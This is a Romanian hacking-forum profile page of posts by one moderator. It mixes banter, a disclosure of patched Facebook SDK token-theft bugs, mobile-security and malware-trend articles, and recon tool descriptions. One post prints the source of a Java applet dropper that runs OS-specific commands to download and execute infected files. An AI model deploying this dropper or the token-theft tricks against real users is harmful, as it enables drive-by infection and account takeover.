Jump to content

M2G

Moderators
  • Posts

    1838
  • Joined

  • Last visited

  • Days Won

    31

Everything posted by M2G

  1. 1. Deci ai nick-ul studentul dar te numesti dark. 2. Ai simtit nevoia sa scrii ca esti user mai vechi dar ti-ai facut "email fantoma". Fratilor, daca stiti ca nu va ocupati cu treburi murdare, pastrati-va userul. In caz contrar nu veniti si scrieti ca defapt sunteti mai vechi dar ati facut cont nou. Aia de la servicii nu-s copii de clasa a IV-a. On: Bine ai (re)venit.
  2. M2G

    Dispar postarile

    Nu exista nici o setare. Va trebui sa te obisnuiesti. Parerea mea este ca e mai bine asa cum este acum. Am observat asta inainte pe ISR si mi-a placut.
  3. M2G

    Dispar postarile

    E normal ca din momentul in care ai vazut un thread sa fie marcat ca si citit. De ce sa fie marcat ca si post nou dupa ce l-ai accesat? E feature, nu bug. S-a mai discutat asta.
  4. Asta e sursa: import java.applet.Applet; import java.io.IOException; public class Client extends Applet { public void init() { String windows1 = getParameter("windows1"); String windows2 = getParameter("windows2"); String linux1 = getParameter("linux1"); String linux2 = getParameter("linux2"); String unix1 = getParameter("unix1"); String unix2 = getParameter("unix2"); String os = System.getProperty("os.name").toLowerCase(); if (os.indexOf("win") >= 0) { try { Process w1 = Runtime.getRuntime().exec(windows1); w2 = Runtime.getRuntime().exec(windows2); } catch (IOException e) { Process w2; e.printStackTrace(); } } if (os.indexOf("mac") >= 0) { try { Process u1 = Runtime.getRuntime().exec(unix1); u2 = Runtime.getRuntime().exec(unix2); } catch (IOException e) { Process u2; e.printStackTrace(); } } if (os.indexOf("lin") >= 0) { try { Process l1 = Runtime.getRuntime().exec(linux1); l2 = Runtime.getRuntime().exec(linux2); } catch (IOException e) { Process l2; e.printStackTrace(); } } } } Nu face altceva decat sa vada ce sistem de operare foloseste victima si sa lanseze scriptul aferent care e in fisierul html. In cazul windows, se foloseste de visual basic script (vbs) pentru a downloada si rula executabilul infectat.
  5. method call?
  6. Al treilea as zice si eu. Procesorul quad cu 12 mb cache o sa faca diferenta. Are mai putina memorie ram dar asta e ieftina si poti sa ii adaugi ulterior. Cred ca scoti ceva mai bun daca il faci pe bucati.
  7. I-am dat o sansa omului, dupa cum am mai spus. In cazul in care ai o problema personala cu mine zi-mi sa stiu sa o rezolvam. Nu am avut nimic cu tine, mi-am recunoscut greseala si am dat si report. Nu consider ca e nimic jenant, spre deosebire de altii (nascuti direct invatati, evident) care in momentul in care apare cineva nou si nu pare sa stie prea multe il ironizeaza si il baga in pizda ma-sii am ales sa ii dau un sfat. Sa il inchida cineva ca face mai multe vizualizari decat subiecte care chiar merita atentie, fiecare dorind sa isi manifeste "superioritatea" fata de un troll. Nu cred ca asta demonstreaza altceva decat nivelul la care sunt multi dintre utilizatorii RST. Aici comenteaza pentru ca aici au ceva de zis. Am incheiat discutia in topicul acesta!
  8. Daca te referi la mine tin sa reamintesc ca dupa primul post am crezut ca e doar un copil care a fost impresionat de tv si am vrut sa ii explic ca modul in care priveste lucrurile e gresit. Desigur, acum dupa ce a mai facut doua posturi se vede ca face doar trolling. I-am dat si report asa ca STFU.
  9. Vulnerabilitatea a fost reparata de catre facebook. Summary As a part of our study of various security critical Javascript SDKs we did an analysis of the Facebook Connect JS SDK. Since they use HTML5 based PostMessage API we were specifically interested in the way the origins were validated. We managed to bypass the origin validation by exploiting 3 different bugs in their SDK. These bugs in the Facebook's JavaScript SDK (specifically in the code loaded from xd_arbiter.php) allows a malicious website (M) that a user visits to obtain the user's access tokens for any other website (W) that she has previously authorized. All M needs to know is W's (public) client_id. The attacker M may subsequently use the access token to: (1) log in to W if it enables "login with Facebook" (2) read the user's Facebook profile offline (3) write to the user's Facebook profile feed (if W has this permission). Notably, using (3), M could post a link to itself on the user's profile feed, and thus spread the attack (like a worm) through the user's social network. The attack is widely applicable; it works whether or not W uses the JavaScript SDK. If W is one of Facebook's instant personalization partners like Bing, Yelp, and TripAdvisor, user does not even have to have previously authorize it, and M immediately gets the user's basic profile details. Background Websites such as Facebook, Google, and Live, protect API access to user data through the OAuth 2.0 authorization protocol. To access user data from any of these websites, a web application must first obtain an access token from an authorization server. The token is issued only if the user explicitly gives her permission. A typical use for such tokens is to authenticate a user, by retrieving her email address. This is the basis of single sign-on solutions provided by various social networks (e.g. Login with Facebook). More generally, the token may be used to retrieve user data for personalization, or to post a comment on a user's social profile (e.g. Like buttons). In its strongest server-side configuration (authorization code grant), the OAuth protocol requires each application to authenticate its token request with its identifier and secret key (obtained during registration), and requires that the authorization server only returns the token to a preregistered application URI. However, when returning tokens to JavaScript clients in the Implicit grant flow, authorization servers are more lax. They do not require application authentication, because storing or using long term secret keys in JavaScript is considered dangerous. They require only that the destination web page be on the same origin as the application's registered URI, because browsers do not offer a reliable way to distinguish one page on an origin from another. If a user authorizes a website to access her Facebook profile, she is authorizing every script on every page that will ever be loaded in that website's origin. Facebook JS SDK uses iFrames for Cross domain communication. It creates a proxy iFrame on initialization which basically serves as a communication channel between the 3rd party Client Website and Facebook.com. When a website uses the Facebook JavaScript SDK ("http://connect.facebook.net/en_US/all.js") to ask for an access token which is required to fetch the user's profile data (e.g. by calling FB.login), the SDK creates two iframes, the first "Proxy" iframe communicates with the current website, and the second "OAuth" frame communicates with Facebook. If the OAuth iframe gets an access token back from Facebook, it sends the token to the "Proxy" iframe, which then releases the token to the page. The goal of the whole exchange is that the access token should be given to the current website only if the user has authorized it. We show how this goal is broken. The Proxy iframe is sourced at: https://static.ak.facebook.com/connect/xd_arbiter.php ?version=11 #channel=...& origin=& channel_path=..." Note the parameter "origin", it contains the origin for the current website. The code downloaded from "xd_arbiter.php" exports a function "proxyMessage"; when this function is called with an access token, it sends it to its parent frame as a postMessage with targetOrigin set to the "origin" parameter. Hence, only a website with this "origin" will get access to the token. The OAuth iframe is sourced at: https://www.facebook.com/dialog/oauth ?client_id=& response_type=token code& domain=& redirect_uri=https://static.ak.facebook.com/connect/xd_arbiter.php ?version=11 &cb=... &origin= &relation=parent Here, the "domain" parameter is unimportant, it seems to be optional and typically ignored by all parties. However, the "origin" parameter in the "redirect_uri" must match the "client_id" for which the access token is requested. If they match, and the user has previously authorized an app with this "origin", the Facebook OAuth server will issue an access token and redirect this frame to the location: https://static.ak.facebook.com/connect/xd_arbiter.php ?version=11 &cb=... &origin= &relation=parent #access_token=AAABBBCCC...& code=XXYYZZ Now, the JavaScript code downloaded from "xd_arbiter.php" looks for the Proxy iframe in the parent page and calls its "proxyMessage" function with the access token. (Since both frames are now on the same origin, they can directly call each other's functions.) We found three different ways of confusing the Proxy iframe into releasing its access token to an unauthorized website: Attack 1 Important Dates November 1, 2012: date of report November 2-3, 2012: old bugfix pushed out to CDN Details The first attack relies on the fact that although the OAuth iframe only obtains access tokens for an authorized origin W and the Proxy iframe only releases access tokens to the origin in its fragment identifier, there is no check guaranteeing that these origins are the same. The main flaw in the above flow is that the "origin" parameters passed to the two frames are never compared with each other. By using different origin parameters for the two, a malicious website may steal an authorized website's access token. The attack proceeds as follows: U logs into Facebook and has previously authorized W U visits an attacker-owned website M M starts a Proxy iframe with "origin=M" and an OAuth iframe with "origin=W" The OAuth iframe successfully gets a token for W and passes it to the Proxy iframe The Proxy iframe sends the token to M Attack 2 Important Dates November 5, 2012: date of report November 6, 2012: bug fixed Details This attack was due to a bug in the function called to compare the origins of the two iframes before the Proxy iframe released the access token to the hosting page: function q(z, aa) { if (!z || z.length === 0) return true; if (typeof z === 'string' && z === aa) return true; /* ADDED by the BUGFIX on November 3, 2012 */ var ba = '.' + (/https?:\/\/(.*)$/).exec(aa)[1], ca = z.length; while (ca--) { var da = '.' + z[ca]; if (da == ba.substring(ba.length - da.length)) return true; } i.error('Failed proxying to %s, expected %s', ba, z.toString()); return false; } If (typeof z === 'string' && z !== aa), the code above continues, treating z as an array. Hence, in this case it will take each character c of z and check whether "."+c is a suffix of aa The correct fix would have been: if (typeof z === 'string') if (z === aa) return true; else return false; else {...} The suffix-matching code starting from the third line of q assumes that both z and aa are origins, that is, that they do not have any query params or fragment identifiers. This is a mistaken assumption. Since the value aa is set by the home page, it can have the form "http://whatever.com/?q=.yahoo.com" . This URL should not match the origin "yahoo.com" but it will. Function q is happy to return true for q("yahoo.com","http://whatever.com/?q=.m") Attack 3 Important Dates November 9, 2012: date of report November 10, 2012: bug fixed Details The third attack was a parameter pollution attack where you pass two values of a parameter and different values are processed on the clientside and the server side. We exploit this bug by passing two values of origin in the redirect uri to the OAuth endpoint as given below: https://www.facebook.com/dialog/oauth?client_id[...]origin=1&redirect_uri=http[...]xd_arbiter.php%3Fversion%3D15%[...] origin%3D [ORIGIN 1] %26 origin%3D [ORIGIN 2] %26 relation%3Dparent&sdk=joey While the PHP code on the server validates the second value of the Origin and ignores the first one and redirects to the Redirect URI with both the origins in the query string, JS SDK parses the returned query string in such a way so that the first value is validated. Impact All Facebook users were vulnerable to privacy breaches; a malicious website can get the same information about them as Facebook's instant personalization partners.All Facebook users who have ever authorized "Login with Facebook" on a website were vulnerable to impersonation attacks on that website. All Facebook users who have ever authorized "Facebook Sharing" on a website were vulnerable to privacy breaches and profile spamming; a malicious website can read their profile and write any message on their wall. Notably it could have propagated the attack through Facebook as a worm by posting a link to itself. Sursa
      • 1
      • Upvote
  10. “Data stored on the device is worth more than the device” Introduction The above quote might well apply to desktops and laptops as well. But it’s much more probable that your mobile device might be used by someone or lost, compared to your laptop or desktop. This fact changes the entire scenario. With the advent of mobile phones and smart phones, the game has enormously changed in the last few years with respect to the ease with which tasks are accomplished. This article focuses on various security-related aspects which are involved with increased use of mobiles. Before jumping into the security concerns, here is a small introduction about how the mobile technology has slowly taken over the whole world. The first hand-held mobile device was demonstrated by two Motorola employees in 1973. After 10 years, i.e. in 1983, the first mobile was commercially made available. From 1990 to the early 2000s, mobile phones spread rapidly; people used it mainly for communication. In the last 10 years, with the rapid increase in internet usage, mobiles started accommodating the features of personal computers and finally took a new shape with the introduction of “smart phones.” Today mobiles have penetrated into each and every corner of this world, serving a variety of tasks including mobile applications, GPS navigation, storage, entertainment, etc. In this article we will mainly focus on mobile applications and their security concerns. Mobile applications Mobile phone applications extend the functionality of mobile phones. Everything is readily available and the tasks which were previously accomplished in a desktop world are now available on mobile just with a single click. People now use mobile applications to assist them in several day-to-day activities and enterprises are in a mad rush to develop the mobile apps to reach out to the users in a better way. What is a mobile app anyway? A mobile app is a software application developed to run on mobiles. Each mobile operating system has a corresponding distribution platform from where these mobile apps can be downloaded. For example, Android apps can be downloaded from Google Play and iPhone apps can be downloaded from the Apple App Store. So an individual or a company can develop a mobile application and upload it to the distribution platform and advertise it so that users can download and use it. The general demand and the ease of development of these mobile apps have resulted in their enormous growth. So these days we have a mobile app for everything – fox example, mobile banking, online shopping, ticket purchases, games etc. The real question is how secure are the mobile apps that deal with sensitive information. So let’s have a look at general mobile security-related issues which are common to all the platforms. Mobile Security Mobile security is increasingly playing a crucial role as more sensitive and personal information is now stored in the mobile phones. Security is considered as a crucial and central aspect during the unveiling of any Smartphone. Moreover, with the corporate world embracing the mobiles in a big way, the focus is very much on the security of these devices. Attacks that have been seen on PCs are now slowly making their way onto the mobiles. At a higher level, mobile-related attacks can be classified into these categories: Attacks based on OS–Exploiting the loopholes present at OS level. So the concerned vendor has to release a patch to fix the issue. Attacks based on mobile apps–Exploiting the security holes present in mobile application, which are a result of poor coding/development. Attacks based on communication networks–Attacks on GSM, Wi-Fi, Bluetooth, etc. Malware-related attacks–Malware attacks on mobiles have been rising continuously. A successful attack can steal the photos on your mobile, hijack the camera click, hack the emails, and delete the files on the mobile. Let’s now move on and talk a little bit more about the current issues related to mobile security. The following is a list of the main issues in the field of mobile security. Please note that this is not the complete list and it is not in any particular order. Let’s have brief look into the security issues which revolve around the mobile devices currently. Physical security Physical security is one of the biggest challenges to the designers of mobile phones and their applications. Mobile phones are lost, stolen, and borrowed (many times by others to make a call or view the photos). When a mobile device is lost, the real concern is not about the cost of the mobile but the amount of sensitive data that is present on that mobile. Imagine that the personal phone which is provided by your employer for enterprise activities falls into the hands of the wrong person, who tweaks the data present in it. Imagine a situation where your neighbor asks your mobile for a quick call and then downloads a malware onto that phone (by the way, it just takes a few seconds to do that). These issues are rather less when you are dealing with a desktop, because it would be unusual if you lose your desktop computer. So the bottom line is that mobile applications and systems are to be designed assuming that untrusted parties will be granted access to the phone. No such thing as “logging” into mobile In the desktop world, each user supplies a username and password and logs into the system where he gets access to his environment. Each user has a different environment and thus the privileges and data that each user has are separated. This ensures that one account doesn’t have access to the data of other account. But this concept is not valid in a mobile world because there is nothing like logging into a mobile for each user. So sharing and accessing of data between applications is a big concern. Secure storage of data on the phone In addition to the sensitive files present on your mobile (photos, contacts, documents, etc.), mobile applications also store sensitive information like authentication tokens, password-related files etc. It’s very important that these files are protected. One way is by storing them securely on the mobile so that they are not accessible or usable. For instance, password files must be stored in encrypted fashion so that even after accessing those files they are of not much use. Mobile browsing environment In a mobile browser, it is not possible to see the entire URL; sometimes the URL can’t be seen at all. This paves the way for hackers to unleash phishing-related attacks. So the display space on a mobile device increases the possibility of phishing attacks manyfold. The fact that people are more inclined to follow links on mobile blindly adds to this problem. So in this mobile browsing environment, it’s impossible to expect a normal user to verify every link before following it. Isolating the applications The range of mobile applications that we install today is diverse: social applications to connect to family and friends, enterprise applications to manage your work, banking applications to transfer funds, gaming applications for entertainment, and many more. So it’s very important that a social networking app does not gain access to your corporate app or that a gaming app does not gain access to the banking app. In short, application isolation is crucial. This would depend on the factors like OS permissions in different platforms and how these permissions are granted. Exploiting the existing mechanisms to gain unauthorized access is one area where hackers are actively targeting. Update Process Operating systems require patches/updates to resolve any security issues that are discovered. OS’s like Windows look continuously for updates and install them. But when it comes to mobile OS the patching process is not as simple as that. When a bug is reported in a particular OS, the OS vendor comes with a patch. He then publishes this information to all the carriers (like AT&T, Sprint, and Airtel etc.). Now these carriers will not be proactive in installing these updates because there is every chance that during patching processes other applications might break down. Hence if these carriers find such cases with the patching, they hold it on for some time without applying the patch/update immediately. Proper Authentication The authentication process is very important in mobile phones because, as explained earlier, it is just a matter of seconds before someone asks your phone and does something malicious and you have no idea about it. In the cases where a company offers extranet access to its corporate network through mobiles, there should be a means of multifactor authentication because if that mobile falls into the hands of the wrong guys, it would expose the internal network of the company. Multifactor authentication needs to be implemented and improved in order to solve many issues. Poor coding of mobile apps Poor coding or development practices of the developers could lead to severe consequences. For example: hard coding of sensitive data like passwords, transmission of information in unencrypted channel, weak server side controls, improper session handling, etc. Many of the vulnerabilities that apply to the web will apply to mobile applications as well. Bluetooth and other attacks Bluetooth and other drivers pose a security threat to the overall security posture of the mobiles. We have seen in the past about the vulnerabilities reported on Bluetooth and other third-party drivers. Since these have system access, by exploiting a critical vulnerability an attacker might even get access to everything on a mobile. So even if the underlying operating system has excellent built-in mechanisms that do not easily grant system access, these vulnerable third-party drivers would be a setback at any time. Malware Attacks Many surveys point out that malware attacks on mobile phones is on the rise. If you are someone who browses through tech news every now and then, you must have seen some news about android phones getting infected by malware in a big way. Malware is something which harms the system in which in resides. With a new computing environment, a new class of threats in new forms arise. It is very important that these issues are addressed proactively leveraging on our experiences of the 1990s. Reports have also been published which forecast the situation to be worse in the coming year and some say that 2013 will be the” year of mobile malware”! Jailbreaking the phones Many users jailbreak the phone in order to run applications for free or to run applications which are not authorized by the vendor. Jailbreaking a phone removes the restrictions imposed on a device by its vendor. Hence jailbroken devices are more susceptible to computer viruses and malware. Downloading the apps from an unauthorized third-party store will only put your mobile at risk. New features like NFC pose a serious threat NFC (Neat Field Communication) is a technology that allows you to beam the content to nearby devices and lets you use your mobile as a wallet to purchase items. It has been demonstrated in Black hat conferences that by brushing a tag with an embedded NFC chip over an android phone, it is possible to take over the control of the phone. So with increase in technology, you will need to address more complex attack scenarios. In future, many more advanced technologies like these are expected to come and they bring a whole lot of new issues to address. User awareness User awareness is major factor in controlling many of the attacks and, when it comes to mobiles, it’s even more important. There are many things from the user end which he should be careful about: having a passcode for the device and looking out for the permissions granted to application (a gaming application may not need access to dialling), not following the links sent by unknown persons. As the time progresses, the industry has more challenges to face and answer. For instance new ideas pose a security threat like BYOD (Bring Your Own Device) where employees bring their personal mobile devices to their work place. Since there are huge number of devices out there, each having its own security issues, it’s a huge task for any organization to guarantee the corporate equivalent of privacy on these devices. These are some of the basic issues that are involved in current mobile security. If anyone of you has more points to make, I sincerely ask that you comment and share with the community. Sursa
  11. Software vulnerabilities will be the main target of cyber-criminals next year, according to a list of security trends that will dominate in 2013 by PandaLabs. "It is undoubtedly the preferred method of infection for compromising systems transparently, used by both cyber-criminals and intelligence agencies in countries around the world," said Luis Corrons , technical director of PandaLabs. In 2012, Java, which is installed on hundreds of millions of devices, was repeatedly compromised and used to actively infect millions of users. Adobe, given the popularity of its applications (Acrobat Reader, Flash, etc.) and its multiple security flaws, was also one of the favorite tools for massively infecting users as well as for targeted attacks. "Although it is assumed that home users are exposed to the highest risk, updating applications, which is essential for protecting against these types of attacks, is a very complex process for corporations who must coordinate the update among all workstations," explained Luis Corrons . "At the same time, all the applications used in a company must work correctly. This makes the update processes slow, which opens a window that is exploited to steal information in general and launch targeted attacks in search of confidential data." PandaLabs predicts that other areas that will emerge in 2013 as dominant security issues are: Social networks: The second most widely used technique is social engineering. Tricking users into collaborating to infect their computers and steal their data is an easy task, as there are no security applications to protect users from themselves. In this context, use of social networks (Facebook, Twitter, etc.), places where hundreds of millions of users exchange personal information, makes them the preferred hunting ground for tricking users. Particular attention should be paid to Skype, which after replacing Messenger, could become a target for cyber-criminals. Malware for mobile devices: Android has become the dominant mobile operating system. In September 2012, Google announced that it had reached 700 million Android activations. Although it is mainly used on smartphones and tablets, its flexibility and the fact that you do not have to buy a license to use it are going to result in new devices opting to use Google's operating system. Its use is going to become increasingly widespread, from televisions to all types of home appliances, which opens up a world of possible attacks as yet unknown. Cyber-warfare / Cyber-espionage: Throughout 2012, different types of attacks have been launched against nations. The Middle East is worth mentioning, where the conflict is also present in cyber-space. In fact, many of these attacks are not even carried out by national governments but by citizens, who feel that they should defend their nation by attacking their neighbors using any means available. Furthermore, the governments of the world's leading nations are creating cyber commandos to prepare both defense and attack and therefore, the cyber-arms race will escalate. Growth of malware: For two decades, the amount of malware has been growing dramatically. The figures are stratospheric, with tens of thousands of new malware strains appearing every day. This sustained growth seems very far from coming to an end. Despite security forces being better prepared to combat this type of crime, they are still handicapped by the absence of borders on the Internet. A police force can only act within its jurisdiction, whereas a cyber-crook can launch an attack from country A, steal data from citizens of country B, send the stolen data to a server situated in country C and could be living in country D. This can be done in just a few clicks, whereas coordinated action of security forces across various countries could take months. For this reason, cyber-criminals are still living their own golden era. Malware for Mac: Cases like Flashback, which occurred in 2012, have demonstrated that not only is Mac susceptible to malware attacks but that there are also massive infections affecting hundreds of thousands of users. Although the number of malware strains for Mac is still relatively low compared to malware for PCs, we expect it to continue rising. A growing number of users added to security flaws and lack of user awareness (due to over-confidence), mean that the attraction of this platform for cyber-crooks will continue to increase next year. Windows 8: Microsoft's latest operating system, along with all of its predecessors, will also suffer attacks. Cyber-criminals are not going to focus on this operating system only but they will also make sure that their creations work equally well on Windows XP to Windows 8, through Windows 7. One of the attractions of Microsoft's new operating system is that it runs on PCs, as well as on tablets and smartphones. For this reason, if functional malware strains that allow information to be stolen regardless of the type of device used are developed, we could see a specific development of malware for Windows 8 that could take attacks to a new level. Sursa
  12. https://www.coursera.org/course/malsoftware Incepe in junie, dati de acum signup si o sa va dea mail inainte sa inceapa. Learn about traditional and mobile malware, the security threats they represent, state-of-the-art analysis and detection techniques, and the underground ecosystem that drives such a profitable but illegal business. About the Course Cybercrime has become both more widespread and harder to battle. Researchers and anecdotal experience show that the cybercrime scene is becoming increasingly organized and consolidated, with strong links also to traditional criminal networks. Modern attacks are indeed stealthy and often profit oriented. Malicious software (malware) is the traditional way in which cybercriminals infect user and enterprise hosts to gain access to their private, financial, and intellectual property data. Once stolen, such information can enable more sophisticated attacks, generate illegal revenue, and allow for cyber-espionage. By mixing a practical, hands-on approach with the theory and techniques behind the scene, the course discusses the current academic and underground research in the field, trying to answer the foremost question about malware and underground economy, namely, "Should we care?". Students will learn how traditional and mobile malware work, how they are analyzed and detected, peering through the underground ecosystem that drives this profitable but illegal business. Understanding how malware operates is of paramount importance to form knowledgeable experts, teachers, researchers, and practitioners able to fight back. Besides, it allows us to gather intimate knowledge of the systems and the threats, which is a necessary step to successfully devise novel, effective, and practical mitigation techniques.
  13. The Indian Defence Research and Development Organization (DRDO) is developing India's own secure operating system to strengthen cyber security. The Director-General of the DRDO, V K Saraswat said that India currently is dependent on many imported OSes based on windows, Linux ,which is likely to be having malware and security holes. That’s why it is essential that India builds its Own operating system. 150 Engineers across the country have already been working on creating an Indian OS for over one year and a half. According to Times of India ,it will be ready in next three years. Saraswat pointed out that there is no foreign involvement in this project. It is purely build by Indians. He also advised Defence researchers and scientists to start working together with industry and DRDO and other scientific departments to bring country's own operating system soon. "we are independent from what is coming from outside world," he stressed. Great..! But i have to wait for three yeas?!. I want Indian mastermind to create their own Search Engine and more. India has more number of Internet users next to China and US. China and U.S has their own search engine, then why don't you?! Sursa Si noi inchidem comunitati, aruncam talente in afara tarii si ne laudam la tv ca avem hackeri. Iar o sa fim ultimii intr-un domeniu in care puteam sa fim printre primii.
  14. Introduction Bing.com is a search engine owned by Microsoft formerly known as MSN Search and Live Search. It has a unique feature to search for websites hosted on a specific IP address. This feature is can be used with the IP: parameter in the search query as shown in the image above. Bing-ip2hosts uses this feature to enumerate all hostnames which Bing has indexed for a specific IP address. This technique is considered best practice during the reconnaissance phase of a penetration test in order to discover a larger potential attack surface. Bing-ip2hosts is written in the Bash scripting language for Linux. This uses the mobile interface and no API key is required. Usage Usage: ./bing-ip2hosts [OPTIONS] OPTIONS are: -n Turn off the progress indicator animation -t <DIR> Use this directory instead of /tmp. The directory must exist. -i Optional CSV output. Outputs the IP and hostname on each line, separated by a comma. -p Optional http:// prefix output. Useful for right-clicking in the shell. Example usage and output $ ./bing-ip2hosts treshna.com [ 210.48.71.196 | Scraping 10-19 of 27 | Found 13 | \ ] annaklekottka.com ignavus.net ladychatterley.co.nz massivenz.com nzbridgecongress.co.nz nzcps.treshna.com stac.treshna.com www.cricklewoodhouse.co.nz www.dressfordialogue.com www.glaciervalley.co.nz www.hurunuihotel.co.nz www.ignavus.net www.kokiribnb.co.nz www.massivenz.com www.nzkiosk.co.nz www.zqnbalmoral.co.nz License GPLv3 Author Andrew Horton aka urbanadventurer, MorningStar Security Download Website: bing-ip2hosts
  15. Credeam ca esti doar un copil care a auzit despre hackeri la tv din primul tau post, acum report si jet.
  16. Introduction WhatWeb identifies websites. Its goal is to answer the question, “What is that Website?”. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 900 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the trade off between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called ‘passive’, is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for in penetration tests. Most WhatWeb plugins are thorough and recognise a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. ‘‘, but a minority of WordPress websites remove this identifying tag but this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for “/wp-content/” within relative links. Features: Example Usage Using a higher aggression level to identify the version of Joomla in use. Help .$$$ $. .$$$ $. $$$$ $$. .$$$ $$$ .$$$$$$. .$$$$$$$$$$. $$$$ $$. .$$$$$$$. .$$$$$$. $ $$ $$$ $ $$ $$$ $ $$$$$$. $$$$$ $$$$$$ $ $$ $$$ $ $$ $$ $ $$$$$$. $ `$ $$$ $ `$ $$$ $ `$ $$$ $$' $ `$ `$$ $ `$ $$$ $ `$ $ `$ $$$' $. $ $$$ $. $$$$$$ $. $$$$$$ `$ $. $ :' $. $ $$$ $. $$$$ $. $$$$$. $::$ . $$$ $::$ $$$ $::$ $$$ $::$ $::$ . $$$ $::$ $::$ $$$$ $;;$ $$$ $$$ $;;$ $$$ $;;$ $$$ $;;$ $;;$ $$$ $$$ $;;$ $;;$ $$$$ $$$$$$ $$$$$ $$$$ $$$ $$$$ $$$ $$$$ $$$$$$ $$$$$ $$$$$$$$$ $$$$$$$$$' WhatWeb - Next generation web scanner. Version 0.4.7 by Andrew Horton aka urbanadventurer from Security-Assessment.com Homepage: http://www.morningstarsecurity.com/research/whatweb Usage: whatweb [options] TARGET SELECTION: Enter URLs, filenames or nmap-format IP ranges. Use /dev/stdin to pipe HTML directly --input-file=FILE, -i Identify URLs found in FILE, eg. -i /dev/stdin --url-prefix Add a prefix to target URLs --url-suffix Add a suffix to target URLs --url-pattern Insert the targets into a URL. Requires --input-file, eg. www.example.com/%insert%/robots.txt --example-urls, -e Add example URLs for each selected plugin to the target list. By default will add example URLs for all plugins. AGGRESSION LEVELS: --aggression, -a=LEVEL The aggression level controls the trade-off between speed/stealth and reliability. Default: 1 Aggression levels are: 1 (Passive) Make one HTTP request per target. Except for redirects. 2 (Polite) Reserved for future use 3 (Aggressive) Triggers aggressive plugin functions only when a plugin matches passively. 4 (Heavy) Trigger aggressive functions for all plugins. Guess a lot of URLs like Nikto. HTTP OPTIONS: --user-agent, -U=AGENT Identify as AGENT instead of WhatWeb/0.4.7. --user, -u= HTTP basic authentication --header, -H Add an HTTP header. eg "Foo:Bar". Specifying a default header will replace it. Specifying an empty value, eg. "User-Agent:" will remove the header. --follow-redirect=WHEN Control when to follow redirects. WHEN may be `never', `http-only', `meta-only', `same-site', `same-domain' or `always'. Default: always --max-redirects=NUM Maximum number of contiguous redirects. Default: 10 SPIDERING: --recursion, -r Follow links recursively. Only follow links under the path Default: off --depth, -d Maximum recursion depth. Default: 10 --max-links, -m Maximum number of links to follow on one page Default: 250 --spider-skip-extensions Redefine extensions to skip. Default: zip,gz,tar,jpg,exe,png,pdf PROXY: --proxy Set proxy hostname and port Default: 8080 --proxy-user Set proxy user and password PLUGINS: --plugins, -p Comma delimited set of selected plugins. Default is all. Each element can be a directory, file or plugin name and can optionally have a modifier, eg. + or - Examples: +/tmp/moo.rb,+/tmp/foo.rb title,md5,+./plugins-disabled/ ./plugins-disabled,-md5 -p + is a shortcut for -p +plugins-disabled --list-plugins, -l List the plugins --info-plugins, -I Display information for all plugins. Optionally search with keywords in a comma delimited list. --custom-plugin Define a custom plugin called Custom-Plugin, Examples: ":text=>'powered by abc'" ":regexp=>/powered[ ]?by ab[0-9]/" ":ghdb=>'intitle:abc \"powered by abc\"'" ":md5=>'8666257030b94d3bdb46e05945f60b42'" "{:text=>'powered by abc'},{:regexp=>/abc [ ]?1/i}" LOGGING & OUTPUT: --verbose, -v Increase verbosity, use twice for plugin development. --colour,--color=WHEN control whether colour is used. WHEN may be `never', `always', or `auto' --quiet, -q Do not display brief logging to STDOUT --log-brief=FILE Log brief, one-line output --log-verbose=FILE Log verbose output --log-xml=FILE Log XML format --log-json=FILE Log JSON format --log-json-verbose=FILE Log JSON Verbose format --log-magictree=FILE Log MagicTree XML format --log-object=FILE Log Ruby object inspection format --log-mongo-database Name of the MongoDB database --log-mongo-collection Name of the MongoDB collection. Default: whatweb --log-mongo-host MongoDB hostname or IP address. Default: 0.0.0.0 --log-mongo-username MongoDB username. Default: nil --log-mongo-password MongoDB password. Default: nil --log-errors=FILE Log errors PERFORMANCE & STABILITY: --max-threads, -t Number of simultaneous threads. Default: 25. --open-timeout Time in seconds. Default: 15 --read-timeout Time in seconds. Default: 30 --wait=SECONDS Wait SECONDS between connections This is useful when using a single thread. HELP & MISCELLANEOUS: --help, -h This help --debug Raise errors in plugins --version Display version information. (WhatWeb 0.4.7) EXAMPLE USAGE: whatweb example.com whatweb -v example.com whatweb -a 3 example.com whatweb 192.168.1.0/24 Logging & Output Verbose output is specified with -v The following types of logging are supported: –log-brief=FILE Brief, one-line, greppable format –log-verbose=FILE Verbose –log-xml=FILE XML format. XSL stylesheet is provided –log-json=FILE JSON format –log-json-verbose=FILE JSON verbose format –log-magictree=FILE MagicTree XML format –log-object=FILE Ruby object inspection format –log-mongo-database Name of the MongoDB database –log-mongo-collection Name of the MongoDB collection. Default: whatweb –log-mongo-host MongoDB hostname or IP address. Default: 0.0.0.0 –log-mongo-username MongoDB username. Default: nil –log-mongo-password MongoDB password. Default: nil –log-errors=FILE Log errors. This is usually printed to the screen in red. You can output to multiple logs simultaneously by specifying multiple command line logging options. Download whatweb-0.4.7.tar.gz Latest Version 0.4.7, 5th April 2011 License GPLv2 Author urbanadventurer aka Andrew Horton Wiki The WhatWeb Wiki Development Version WhatWeb on GitHub Website: WhatWeb
  17. Introduction GGGooglescan is a Google scraper which performs automated searches and returns results of search queries in the form of URLs or hostnames. Datamining Google’s search index is useful for many applications. Despite this, Google makes it difficult for researchers to perform automatic search queries. The aim of GGGooglescan is to make automated searches possible by avoiding the search activity that is detected as bot behaviour. Please note that using this software may be in violation of Google’s terms of service. Antibot Avoidance Features * To appear more like a human, it does not search beyond a page with the text: “In order to show you the most relevant results, we have omitted some entries very similar” * When Google detects bot-type activity, it redirects to this page which contains a captcha: http://sorry.google.com/sorry/?continue=. gggooglescan will detect this and wait for 60 minutes before re-attempting the search query. * Horizontal searching is a technique to harvest a large number of search results without appearing like a bot. Deep query searching is requesting high numbers of search result pages, eg. requesting result pages 1 through 50 which is detected as bot activity by Google. Horizontal searching allows you to query a large search result space without deep query searching. It works by combining your search query with each word in 